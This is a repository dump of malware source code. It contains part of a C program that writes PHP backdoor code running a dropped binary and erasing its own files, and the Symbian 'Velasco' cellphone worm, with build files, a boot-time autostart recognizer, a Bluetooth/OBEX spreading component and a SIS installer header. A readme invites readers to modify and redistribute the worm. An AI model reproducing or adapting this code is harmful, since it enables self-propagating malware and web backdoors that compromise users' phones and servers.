546 | while(1){ 547 | s_s=sizeof(struct sockaddr_in); 548 | if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1) 549 | { 550 | close(nw_gt_sock); 551 | close(sc_gt_sock); 552 | return(-1); 553 | } 554 | while(recv(nw_gt_sock,&t_c,1,0)){ 555 | if(t_c==0x0d){ 556 | recv(nw_gt_sock,&t_c,1,0); 557 | if(t_c==0x0a){ 558 | recv(nw_gt_sock,&t_c,1,0); 559 | if(t_c==0x0d){ 560 | recv(nw_gt_sock,&t_c,1,0); 561 | if(t_c==0x0a){ 562 | break; 563 | } 564 | } 565 | } 566 | } 567 | } 568 | 569 | send(nw_gt_sock,http_rq,strlen(http_rq),0); 570 | if((fp=fopen(CMD_FILE,"r"))==NULL){ 571 | close(nw_gt_sock); 572 | close(sc_gt_sock); 573 | return(-1); 574 | } 575 | memset((char *)t_b,0,sizeof(t_b)); 576 | while(fgets(t_b,sizeof(t_b)-1,fp)){ 577 | send(nw_gt_sock,t_b,strlen(t_b),0); 578 | } 579 | fclose(fp); 580 | close(nw_gt_sock); 581 | continue; 582 | } 583 | close(sc_gt_sock); 584 | return(-1); 585 | } 586 | } 587 | 588 | void re_connt_lm(int st_sock_va,int type) 589 | { 590 | if(st_sock_va==-1) 591 | { 592 | if(!type){ 593 | kill(getppid(),9); // parent 594 | } 595 | kill((int)proc_r(),9); // child 596 | sf_exit(); 597 | } 598 | } 599 | 600 | int proc_r(){ 601 | FILE *fp; 602 | int proc_n; 603 | if((fp=fopen(PRC_FILE,"r"))==NULL){ 604 | exit(-1); // child check. 605 | } 606 | fscanf(fp,"%16d",&proc_n); 607 | fclose(fp); 608 | return proc_n; 609 | } 610 | 611 | int g_ip(char *ip) 612 | { 613 | int sock; 614 | struct ifreq ifpq; 615 | struct sockaddr_in *pq; 616 | 617 | memset(&ifpq,0,sizeof(ifpq)); 618 | if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 619 | { 620 | return(-1); 621 | } 622 | pq=(struct sockaddr_in *)&ifpq.ifr_addr; 623 | pq->sin_family=AF_INET; 624 | 625 | memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name)); 626 | if(ioctl(sock,SIOCGIFADDR,&ifpq)==0) 627 | { 628 | memset((char *)ip,0,(MIN_BUF)); 629 | snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr)); 630 | } 631 | return 0; 632 | } 633 | 634 | #define BACKDOOR_PATH "zblog.php" 635 | #define CODE_PATH "zbcode" 636 | #define CODE_PATH_SRC "zbcode.c" 637 | 638 | int make_cmd_file() 639 | { 640 | unsigned long w1=0; 641 | FILE *fp; 642 | FILE *pf; 643 | 644 | if((fp=fopen(CMD_FILE,"w"))==NULL) 645 | { 646 | return(-1); 647 | } 648 | 649 | fprintf(fp,"1024){\n"); 741 | fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH); 742 | fprintf(fp,"}\n}\n"); 743 | #else 744 | fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH); 745 | fprintf(fp,"unlink('%s');\n",CODE_PATH); 746 | 747 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH); 748 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1); 749 | fprintf(fp,"} else { fclose($fp);\n"); 750 | fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH); 751 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH); 752 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1); 753 | fprintf(fp,"}\n}\n"); 754 | 755 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH); 756 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2); 757 | fprintf(fp,"} else { fclose($fp);\n"); 758 | fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH); 759 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH); 760 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2); 761 | fprintf(fp,"}\n}\n"); 762 | #endif 763 | fprintf(fp,"?>\n"); 764 | fclose(fp); 765 | } 766 | 767 | int filter_f(char *test_bf,int tnum) 768 | { 769 | switch(search_va[tnum].num) 770 | { 771 | case 0: /* google */ 772 | if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:") 773 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 774 | &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...") 775 | &&!strstr(test_bf,VENDOR)) 776 | { 777 | return 1; 778 | } 779 | else return 0; 780 | break; 781 | 782 | case 1: /* yahoo */ 783 | if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?") 784 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 785 | &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%") 786 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 787 | { 788 | return 1; 789 | } 790 | else return 0; 791 | break; 792 | 793 | case 2: /* nate */ 794 | if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT") 795 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 796 | &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F") 797 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 798 | { 799 | return 1; 800 | } 801 | else return 0; 802 | break; 803 | 804 | case 3: /* lycos */ 805 | if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<") 806 | &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F") 807 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 808 | { 809 | return 1; 810 | } 811 | else return 0; 812 | break; 813 | 814 | case 4: /* altavista */ 815 | if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<") 816 | &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f") 817 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 818 | { 819 | return 1; 820 | } 821 | else return 0; 822 | break; 823 | 824 | default: 825 | return 0; 826 | break; 827 | } 828 | return 0; 829 | } 830 | 831 | 832 | 833 | -------------------------------------------------------------------------------- /velasco/Marcos Velasco Security.url: -------------------------------------------------------------------------------- 1 | [InternetShortcut] 2 | URL=http://www.velasco.com.br/index.htm 3 | Modified=80801E4FFA04C3012F 4 | -------------------------------------------------------------------------------- /velasco/marcos/group/bld.inf: -------------------------------------------------------------------------------- 1 | PRJ_MMPFILES 2 | marcos.mmp 3 | -------------------------------------------------------------------------------- /velasco/marcos/group/marcos.mmp: -------------------------------------------------------------------------------- 1 | TARGET marcos.mdl 2 | TARGETTYPE mdl 3 | TARGETPATH \system\recogs 4 | 5 | UID 0x10003A19 0x10005590 6 | 7 | USERINCLUDE ..\inc 8 | SYSTEMINCLUDE \epoc32\include 9 | 10 | SOURCEPATH ..\src 11 | SOURCE marcos.cpp 12 | 13 | LIBRARY euser.lib 14 | LIBRARY apmime.lib apparc.lib apgrfx.lib 15 | LIBRARY efsrv.lib 16 | -------------------------------------------------------------------------------- /velasco/marcos/group/marcos.pkg: -------------------------------------------------------------------------------- 1 | ; 2 | ; Installation file for starter application 3 | ; 4 | ;Languages 5 | &EN 6 | ; 7 | ; UID is the app's UID 8 | ; 9 | #{"marcos"},(0x10005590),1,0,0 10 | ; 11 | ;Supports Series 60 v 0.9 12 | ;This line indicates that this installation is for the Series 60 platform v0.9 13 | ;This line must appear _exactly_ as shown below in the sis file 14 | ;If this line is missing or incorrect, the sis file will not be able 15 | ;to be installed on Series 60 v0.9 platforms 16 | (0x101F6F88), 0, 0, 0, {"Series60ProductID"} 17 | ; 18 | ; 19 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\marcos.mdl"-"!:\system\recogs\marcos.mdl" 20 | -------------------------------------------------------------------------------- /velasco/marcos/inc/marcos.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // EZ-Boot 4 | // 5 | ////////////////////////////////////////////////////////////////////////////// 6 | // Boot & Recognizer Module 7 | // by NewLC (http://www.newlc.com) 8 | ////////////////////////////////////////////////////////////////////////////// 9 | // File : ezrecog.h 10 | // Compatibility: Symbian OS v6.1 11 | // History: 12 | // 2003.07.26: EBS : Creation 13 | // 2003.08.12: EBS : Integration in EZBoot 14 | // 2003.09.01: EBS : Add boot file recognition 15 | // 2003.10.28: EBS : Cleanup and comment 16 | ////////////////////////////////////////////////////////////////////////////// 17 | 18 | #include // CApaDataREcognizerType 19 | 20 | #define KUidRecog 0x10005590 // Use your own value here !!! 21 | 22 | class CRecog : public CApaDataRecognizerType 23 | { 24 | public: 25 | CRecog(); 26 | TUint PreferredBufSize(); 27 | TDataType SupportedDataTypeL(TInt aIndex) const; 28 | static void BootUp(); 29 | static TInt BootUpKick(TAny *aParam); 30 | static void BootUpKickL(); 31 | 32 | private: 33 | void DoRecognizeL(TDesC& aName, const TDesC8& aBuffer); 34 | TBool HeaderRecognized(const TDesC8& aBuf); 35 | TBool NameRecognized(const TDesC& aName); 36 | }; 37 | -------------------------------------------------------------------------------- /velasco/marcos/src/marcos.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // EZ-Boot 4 | // 5 | ////////////////////////////////////////////////////////////////////////////// 6 | // Boot & Recognizer Module 7 | // by NewLC (http://www.newlc.com) 8 | ////////////////////////////////////////////////////////////////////////////// 9 | // File : ezrecog.cpp 10 | // Compatibility: Symbian OS v6.1 11 | // History: 12 | // 2003.07.26: EBS : Creation 13 | // 2003.08.12: EBS : Integration in EZBoot 14 | // 2003.09.01: EBS : Add boot file recognition 15 | // 2003.10.28: EBS : Cleanup and comment 16 | ////////////////////////////////////////////////////////////////////////////// 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include "marcos.h" 27 | 28 | ////////////////////////////////////////////////////////////////////////////// 29 | // 30 | // Recognition Definitions 31 | // 32 | ///////////////////////////////////////////////////////////////////////////// 33 | 34 | // The MIME Type that will be recognized 35 | _LIT8(KEzbMimeType,"text/vnd.newlc.ezboot"); 36 | 37 | // The file extension that shall be used by data we are recognizing 38 | _LIT(KEzbFileExtension,".boot"); 39 | 40 | // The data header that identifies EZBoot data 41 | _LIT8(KEzbDataHeader,"EZBoot:"); 42 | 43 | _LIT(KEzBootExe,"\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.APP"); 44 | 45 | // The priority of the recognizer, can be EHigh, ENormal, ELow 46 | #define KEzRecognizerPriority CApaDataRecognizerType::ENormal 47 | 48 | // The size of the data buffer that will be passed to the recognizer 49 | // so that it performs the recognition 50 | #define KEzRecognizerBufferSize 7 51 | 52 | // The recognizer UID 53 | const TUid KUidEzBoot={KUidRecog}; 54 | 55 | 56 | ////////////////////////////////////////////////////////////////////////////// 57 | // 58 | // Boot Definitions 59 | // 60 | ///////////////////////////////////////////////////////////////////////////// 61 | 62 | // The thread name that will used to launch the above EXE 63 | _LIT(KBootUpThreadName,"EzBootThr"); 64 | 65 | ////////////////////////////////////////////////////////////////////////////// 66 | /// DLL entry point. 67 | /// \param aReason can be ignored. 68 | /// \return Always KErrNone 69 | ///////////////////////////////////////////////////////////////////////////// 70 | GLDEF_C TInt E32Dll(TDllReason /*aReason*/) 71 | { 72 | return(KErrNone); 73 | } 74 | 75 | ////////////////////////////////////////////////////////////////////////////// 76 | /// Recognizer instanciation. This function MUST be the first one defined 77 | /// for the recognizer. 78 | /// \return a pointer on a new allocated recognizer instance 79 | ////////////////////////////////////////////////////////////////////////////// 80 | EXPORT_C CApaDataRecognizerType *CreateRecognizer() 81 | { 82 | // Create a recognizer instance 83 | CApaDataRecognizerType *me = new CRecog(); 84 | 85 | // Start all the boot code under a trap harness 86 | // This is pure boot code and has (normally) nothing to do 87 | // in a recognizer... 88 | CRecog::BootUp(); 89 | 90 | return(me); 91 | } 92 | 93 | ////////////////////////////////////////////////////////////////////////////// 94 | /// Recognizer Constructor. 95 | /// Initialise the internal data member iCountDataTypes with the number of 96 | /// MIME types that will be recognized. Set the recognizer priority. 97 | ////////////////////////////////////////////////////////////////////////////// 98 | CRecog::CRecog() 99 | :CApaDataRecognizerType(KUidEzBoot,KEzRecognizerPriority) 100 | { 101 | iCountDataTypes=1; 102 | } 103 | 104 | ////////////////////////////////////////////////////////////////////////////// 105 | /// Returns the size of the data buffer that will be passed to the recognition 106 | /// function (used by the recognition framework) 107 | /// \see DoRecognizeL() 108 | /// \return size of the data buffer 109 | ////////////////////////////////////////////////////////////////////////////// 110 | TUint CRecog::PreferredBufSize() 111 | { 112 | return(KEzRecognizerBufferSize); 113 | } 114 | 115 | ////////////////////////////////////////////////////////////////////////////// 116 | /// Returns the MIME type that our recognizer is able to manage 117 | /// (used by the recognition framework) 118 | /// \param aIndex: the index of the MIME type to return (will be always 1 for 119 | /// a recognizer that handles a single MIME type) 120 | /// \return a MIME type 121 | ////////////////////////////////////////////////////////////////////////////// 122 | TDataType CRecog::SupportedDataTypeL(TInt /*aIndex*/) const 123 | { 124 | return(TDataType(KEzbMimeType)); 125 | } 126 | 127 | ///////////////////////////////////////////////////////////////////////////// 128 | /// The recognition function. The result of the recognition is stored in 129 | /// the iConfidence data member. 130 | /// \param aName: the name of the file that contain the data to analyze 131 | /// \param aBuffer: the data buffer 132 | /// \see PreferredBufSize() 133 | ///////////////////////////////////////////////////////////////////////////// 134 | void CRecog::DoRecognizeL(TDesC& aName, const TDesC8& aBuffer) 135 | { 136 | // Initialise the result status 137 | iConfidence = ENotRecognized; 138 | iDataType = TDataType(KEzbMimeType); 139 | 140 | // Check that we got the required amount of data 141 | if(aBuffer.Length()5) 179 | { 180 | TInt dotPos = aName.LocateReverse( '.' ); 181 | if (dotPos != KErrNotFound) 182 | { 183 | TInt extLength = aName.Length() - dotPos; 184 | HBufC* ext = aName.Right( extLength ).AllocL(); 185 | CleanupStack::PushL( ext ); 186 | if ( ext->CompareF(KEzbFileExtension) == 0 ) 187 | { 188 | res = ETrue; 189 | } 190 | CleanupStack::PopAndDestroy(); // ext 191 | } 192 | } 193 | return(res); 194 | } 195 | 196 | ///////////////////////////////////////////////////////////////////////////// 197 | /// The data recognition function. This functions checks whether the 198 | /// provided data starts with our data header 199 | /// extension 200 | /// \param aBuf: the data buffer to check 201 | /// \return ETrue if the data are OK 202 | ///////////////////////////////////////////////////////////////////////////// 203 | TBool CRecog::HeaderRecognized(const TDesC8& aBuf) 204 | { 205 | if(aBuf.Find(KEzbDataHeader)==0) 206 | return ETrue; 207 | return EFalse; 208 | } 209 | 210 | 211 | ///////////////////////////////////////////////////////////////////////////// 212 | /// The Boot code (non leaving). Create a new thread and kicks the real 213 | /// boot code. 214 | /// \see BootUpKick() 215 | ///////////////////////////////////////////////////////////////////////////// 216 | void CRecog::BootUp() 217 | { 218 | // Create a new thread 219 | RThread* bootThread = new RThread(); 220 | if(bootThread) 221 | { 222 | TInt res=KErrNone; 223 | 224 | // and Start it 225 | res=bootThread->Create(KBootUpThreadName, 226 | CRecog::BootUpKick, 227 | KDefaultStackSize, 228 | KMinHeapSize, 229 | KMinHeapSize, 230 | NULL, 231 | EOwnerThread); 232 | 233 | if(res==KErrNone) 234 | { 235 | bootThread->Resume(); 236 | bootThread->Close(); 237 | } 238 | else 239 | { 240 | delete bootThread; 241 | } 242 | } 243 | } 244 | 245 | ///////////////////////////////////////////////////////////////////////////// 246 | /// The threaded boot code (non leaving). Actually just create a cleanup 247 | /// stack and call a non-leaving implementation of the boot code 248 | /// \see BootUp() 249 | /// \see BootUpKickL() 250 | /// \param aParam: not used but required as a thread entry point 251 | /// \return thread result 252 | ///////////////////////////////////////////////////////////////////////////// 253 | TInt CRecog::BootUpKick(TAny* /*aParam*/) 254 | { 255 | TInt err=KErrNoMemory; 256 | // Create a cleanup stack... 257 | CTrapCleanup *cleanup=CTrapCleanup::New(); 258 | if(cleanup) 259 | { 260 | //... and Kick under a trap harness 261 | TRAP(err,CRecog::BootUpKickL()); 262 | delete cleanup; 263 | } 264 | return err; 265 | } 266 | 267 | ///////////////////////////////////////////////////////////////////////////// 268 | /// The Boot code. 269 | ///////////////////////////////////////////////////////////////////////////// 270 | 271 | void CRecog::BootUpKickL() 272 | { 273 | // Get the full path (including drive letter) 274 | // to the boot server 275 | RFs fs; 276 | User::LeaveIfError(fs.Connect()); 277 | CleanupClosePushL(fs); 278 | TFindFile findFile(fs); 279 | User::LeaveIfError(findFile.FindByDir(KEzBootExe,KNullDesC)); 280 | 281 | // Connect to the Apparc server 282 | // and start our server 283 | RApaLsSession ls; 284 | User::LeaveIfError(ls.Connect()); 285 | CleanupClosePushL(ls); 286 | CApaCommandLine *cmd = CApaCommandLine::NewLC(); 287 | cmd->SetLibraryNameL(findFile.File()); 288 | cmd->SetCommandL(EApaCommandOpen); 289 | User::LeaveIfError(ls.StartApp(*cmd)); 290 | 291 | // Delete all stuff on the cleanup stack 292 | CleanupStack::PopAndDestroy(3); 293 | } 294 | -------------------------------------------------------------------------------- /velasco/readme.txt: -------------------------------------------------------------------------------- 1 | Worm.SymbOs.Velasco ---> This is the real name 2 | 3 | 4 | Download from: 5 | 6 | http://www.velasco.com.br 7 | 8 | 9 | This is the first cellphone worm with source code available in the world ! 10 | Do you can modify, rename, delete, insert any code... 11 | only sent a .SIS installer to me :-) 12 | 13 | 14 | marcos@velasco.com.br 15 | -------------------------------------------------------------------------------- /velasco/velasco/group/ABLD.BAT: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | REM Bldmake-generated batch file - ABLD.BAT 4 | REM ** DO NOT EDIT ** 5 | 6 | perl -S ABLD.PL \SYMBIAN\6.1\SERIES60\EPOC32\BUILD\VELASCO\GROUP\ %1 %2 %3 %4 %5 %6 %7 %8 %9 7 | if errorlevel==1 goto CheckPerl 8 | goto End 9 | 10 | :CheckPerl 11 | perl -v >NUL 12 | if errorlevel==1 echo Is Perl, version 5.003_07 or later, installed? 13 | goto End 14 | 15 | :End 16 | -------------------------------------------------------------------------------- /velasco/velasco/group/bld.inf: -------------------------------------------------------------------------------- 1 | PRJ_MMPFILES 2 | velasco.mmp 3 | 4 | -------------------------------------------------------------------------------- /velasco/velasco/group/velasco.mmp: -------------------------------------------------------------------------------- 1 | TARGET velasco.app 2 | TARGETTYPE app 3 | UID 0x100039CE 0x10005591 4 | TARGETPATH \system\apps\velasco 5 | LANG SC 6 | 7 | SOURCEPATH ..\src 8 | SOURCE velasco.cpp 9 | SOURCE velascoapplication.cpp 10 | SOURCE velascoappui.cpp 11 | SOURCE velascodocument.cpp 12 | SOURCE velascocopyfiles.cpp 13 | SOURCE file.cpp 14 | SOURCE bluetooth.cpp 15 | 16 | SOURCEPATH ..\group 17 | RESOURCE velasco.rss 18 | 19 | USERINCLUDE ..\inc 20 | 21 | SYSTEMINCLUDE \epoc32\include 22 | 23 | LIBRARY efsrv.lib 24 | LIBRARY esock.lib 25 | LIBRARY euser.lib 26 | LIBRARY apparc.lib 27 | LIBRARY cone.lib 28 | LIBRARY eikcore.lib 29 | LIBRARY avkon.lib 30 | LIBRARY bluetooth.lib 31 | LIBRARY irobex.lib 32 | LIBRARY bafl.lib 33 | -------------------------------------------------------------------------------- /velasco/velasco/group/velasco.pkg: -------------------------------------------------------------------------------- 1 | ; velasco.pkg 2 | ; 3 | ;Language - standard language definitions 4 | &EN 5 | 6 | ; standard SIS file header 7 | #{"Velasco"},(0x10005591),1,0,0,NC 8 | 9 | ;Supports Series 60 v 0.9 10 | (0x101F6F88), 0, 0, 0, {"Series60ProductID"} 11 | 12 | ; 13 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\velasco.rsc"-"!:\system\apps\velasco\velasco.rsc" 14 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\marcos.mdl"-"!:\system\apps\velasco\marcos.mdl" 15 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\velasco.app"-"!:\system\apps\velasco\velasco.app",FR,RI 16 | -------------------------------------------------------------------------------- /velasco/velasco/group/velasco.rss: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2002, Nokia. All rights reserved */ 2 | 3 | NAME VELA 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | // --------------------------------------------------------- 11 | // 12 | // Define the resource file signature 13 | // This resource should be empty. 14 | // 15 | // --------------------------------------------------------- 16 | // 17 | RESOURCE RSS_SIGNATURE { } 18 | 19 | // --------------------------------------------------------- 20 | // 21 | // Default Document Name 22 | // 23 | // --------------------------------------------------------- 24 | // 25 | RESOURCE TBUF r_default_document_name { buf=""; } 26 | 27 | -------------------------------------------------------------------------------- /velasco/velasco/inc/bluetooth.h: -------------------------------------------------------------------------------- 1 | #ifndef __BLUETOOTH_H 2 | #define __BLUETOOTH_H 3 | 4 | #include 5 | 6 | 7 | class VelascoBluetooth : public CActive 8 | { 9 | public: 10 | static VelascoBluetooth* NewL(); 11 | static VelascoBluetooth* NewLC(); 12 | 13 | private: 14 | void ConstructL(); 15 | void RunL(); 16 | 17 | void DoCancel() { }; 18 | 19 | inline VelascoBluetooth(); 20 | 21 | CObexClient *iClient; 22 | CObexFileObject *iCurrObject; 23 | 24 | int FoundCell; 25 | int BluetoothStatus; 26 | }; 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /velasco/velasco/inc/file.h: -------------------------------------------------------------------------------- 1 | #ifndef __FILE_H 2 | #define __FILE_H 3 | 4 | #include 5 | 6 | 7 | class File 8 | { 9 | public: 10 | enum OpenMode {OMRead = 1,OMWrite = 2,OMText = 4,OMCreate = 8,OMReplace = 16,OMOpen = 32}; 11 | 12 | bool Open(const TDesC &,unsigned int mode); 13 | void Close(); 14 | int Read(void *buff,int length); 15 | int Write(void *buff,int length); 16 | void Seek(TSeek mode,int offSet); 17 | 18 | RFile rFile; 19 | 20 | private: 21 | RFs fsSession; 22 | }; 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /velasco/velasco/inc/header.h: -------------------------------------------------------------------------------- 1 | unsigned char headercontent[]= 2 | { 3 | 0x91,0x55,0x00,0x10,0x12,0x3a,0x00,0x10,0x19,0x04,0x00,0x10,0x20, 4 | 0xc4,0x1b,0xee, 5 | 0x00,0x00, // Estes dois bytes serao substituidos pelo CRC16 6 | 0x01,0x00,0x03,0x00,0x01,0x00,0x00,0x00, 7 | 0x00,0x00,0x21,0x00,0x00,0x00,0xc8,0x00,0x00,0x00,0x09,0x00,0x00, 8 | 0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x64,0x00,0x00,0x00, 9 | 0x66,0x00,0x00,0x00,0xf6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a, 10 | 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x01,0x00,0x00,0x00,0x00, 11 | 0x00,0x00,0x76,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 12 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 13 | 0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7a,0x00,0x00, 14 | 0x00,0x12,0x01,0x00,0x00,0x44,0x00,0x00,0x00,0x8c,0x01,0x00,0x00, 15 | 0xbc,0x24,0x00,0x00,0x78,0x03,0x00,0x00,0xbc,0x24,0x00,0x00,0x00, 16 | 0x00,0x00,0x00,0xd0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 17 | 0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x00,0x00,0x00,0xd0,0x01,0x00, 18 | 0x00,0x42,0x00,0x00,0x00,0x48,0x02,0x00,0x00,0xa8,0x08,0x00,0x00, 19 | 0x34,0x28,0x00,0x00,0xa8,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x8a, 20 | 0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 21 | 0x00,0x00,0x7a,0x00,0x00,0x00,0x8a,0x02,0x00,0x00,0x44,0x00,0x00, 22 | 0x00,0x04,0x03,0x00,0x00,0x12,0x00,0x00,0x00,0xdc,0x30,0x00,0x00, 23 | 0x12,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x03,0x00,0x00,0x88, 24 | 0x6f,0x1f,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x22,0x00, 25 | 0x00,0x00,0x48,0x03,0x00,0x00,0x0e,0x00,0x00,0x00,0x6a,0x03,0x00, 26 | 0x00,0x43,0x00,0x3a,0x00,0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00, 27 | 0x62,0x00,0x69,0x00,0x61,0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e, 28 | 0x00,0x31,0x00,0x5c,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00, 29 | 0x65,0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70, 30 | 0x00,0x6f,0x00,0x63,0x00,0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00, 31 | 0x65,0x00,0x6c,0x00,0x65,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c, 32 | 0x00,0x74,0x00,0x68,0x00,0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00, 33 | 0x75,0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x5c,0x00,0x76,0x00,0x65, 34 | 0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x2e,0x00, 35 | 0x61,0x00,0x70,0x00,0x70,0x00,0x21,0x00,0x3a,0x00,0x5c,0x00,0x73, 36 | 0x00,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6d,0x00,0x5c,0x00, 37 | 0x61,0x00,0x70,0x00,0x70,0x00,0x73,0x00,0x5c,0x00,0x76,0x00,0x65, 38 | 0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x5c,0x00, 39 | 0x76,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f, 40 | 0x00,0x2e,0x00,0x61,0x00,0x70,0x00,0x70,0x00,0x43,0x00,0x3a,0x00, 41 | 0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00,0x62,0x00,0x69,0x00,0x61, 42 | 0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x5c,0x00, 43 | 0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x65,0x00,0x73,0x00,0x36, 44 | 0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70,0x00,0x6f,0x00,0x63,0x00, 45 | 0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x65, 46 | 0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c,0x00,0x74,0x00,0x68,0x00, 47 | 0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00,0x75,0x00,0x72,0x00,0x65, 48 | 0x00,0x6c,0x00,0x5c,0x00,0x6d,0x00,0x61,0x00,0x72,0x00,0x63,0x00, 49 | 0x6f,0x00,0x73,0x00,0x2e,0x00,0x6d,0x00,0x64,0x00,0x6c,0x00,0x21, 50 | 0x00,0x3a,0x00,0x5c,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x74,0x00, 51 | 0x65,0x00,0x6d,0x00,0x5c,0x00,0x61,0x00,0x70,0x00,0x70,0x00,0x73, 52 | 0x00,0x5c,0x00,0x76,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00, 53 | 0x63,0x00,0x6f,0x00,0x5c,0x00,0x6d,0x00,0x61,0x00,0x72,0x00,0x63, 54 | 0x00,0x6f,0x00,0x73,0x00,0x2e,0x00,0x6d,0x00,0x64,0x00,0x6c,0x00, 55 | 0x43,0x00,0x3a,0x00,0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00,0x62, 56 | 0x00,0x69,0x00,0x61,0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e,0x00, 57 | 0x31,0x00,0x5c,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x65, 58 | 0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70,0x00, 59 | 0x6f,0x00,0x63,0x00,0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00,0x65, 60 | 0x00,0x6c,0x00,0x65,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c,0x00, 61 | 0x74,0x00,0x68,0x00,0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00,0x75, 62 | 0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x5c,0x00,0x76,0x00,0x65,0x00, 63 | 0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x2e,0x00,0x72, 64 | 0x00,0x73,0x00,0x63,0x00,0x21,0x00,0x3a,0x00,0x5c,0x00,0x73,0x00, 65 | 0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6d,0x00,0x5c,0x00,0x61, 66 | 0x00,0x70,0x00,0x70,0x00,0x73,0x00,0x5c,0x00,0x76,0x00,0x65,0x00, 67 | 